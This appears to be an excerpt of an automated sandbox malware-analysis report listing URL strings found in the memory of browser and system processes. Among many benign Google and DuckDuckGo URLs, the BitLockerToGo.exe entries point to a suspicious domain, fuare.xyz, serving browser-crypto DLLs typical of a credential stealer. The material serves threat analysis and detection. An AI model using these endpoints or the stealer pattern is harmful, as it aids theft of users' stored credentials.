                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webappFq
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                        Source: chrome.exe, 00000005.00000002.2741038731.000007C0010F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default0
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                        Source: chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2743593433.000007C001948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappor
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                        Source: chrome.exe, 00000005.00000002.2741717597.000007C00129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/ogl
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2741278328.000007C00119C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742297584.000007C00140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
                        Source: chrome.exe, 00000005.00000002.2742837621.000007C001678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000003.2675997839.000007C00129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaulteHandler
                        Source: chrome.exe, 00000005.00000002.2737698313.000007C000BE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/ogl
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.googl
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.c
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                        Source: chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.go
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                        Source: chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                        Source: chrome.exe, 00000005.00000003.2647841528.000007C000494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732018060.000007C000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/:
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2
                        Source: chrome.exe, 00000005.00000002.2739080303.000007C000DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2/
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2ation.Result0
                        Source: chrome.exe, 00000005.00000002.2743503663.000007C001900000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?lfhs=2d(0
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2733664269.000007C00060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742527483.000007C0015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/k
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=searchTerms
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: chrome.exe, 00000005.00000002.2737959031.000007C000C54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                        Source: BitLockerToGo.exe, 00000003.00000003.2800189829.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3359198623.000000000304E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2786571854.0000000002F61000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2728075204.0000000002F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz
                        Source: BitLockerToGo.exe, 00000003.00000003.2777786843.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2482726756.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2799501494.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2727762286.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/
                        Source: BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/=
                        Source: BitLockerToGo.exe, 00000003.00000003.2482726756.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/always=a
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/freebl3.dll
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/freebl3.dllgOg
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/mozglue.dll
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/msvcp140.dll
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/nss3.dll
                        Source: BitLockerToGo.exe, 00000003.00000003.2799501494.0000000002EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/rotected_storage
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/softokn3.dll
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/softokn3.dllrH
                        Source: BitLockerToGo.exe, 00000003.00000003.2715960925.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624131446.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2641754783.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2564882804.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/sqlo.dll
                        Source: BitLockerToGo.exe, 00000003.00000003.2641754783.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2799501494.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624131446.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2727762286.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2716384422.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2715960925.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2564882804.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2821091509.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2716714796.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624288132.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/sqlo.dllG
                        Source: BitLockerToGo.exe, 00000003.00000003.2715960925.0000000002EE5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2624131446.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2641754783.0000000002EE9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2564882804.0000000002EE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/sqlo.dllJ&
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/vcruntime140.dll
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/vcruntime140.dll6
                        Source: BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyz/x
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyzAKKJJJK1234567890X
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002B9A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyzHIEBKJJK
                        Source: BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A8D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://fuare.xyzKFIECFIJ
                        Source: svchost.exe, 00000006.00000003.2646192989.0000028B2AD23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                        Source: svchost.exe, 00000006.00000003.2646192989.0000028B2ACB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                        Source: msedge.exe, 00000009.00000002.2830539762.00007CF000394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                        Source: chrome.exe, 00000005.00000002.2733766501.000007C000628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                        Source: msedge.exe, 00000009.00000003.2767383947.00007CF000368000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2768023503.00007CF000354000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
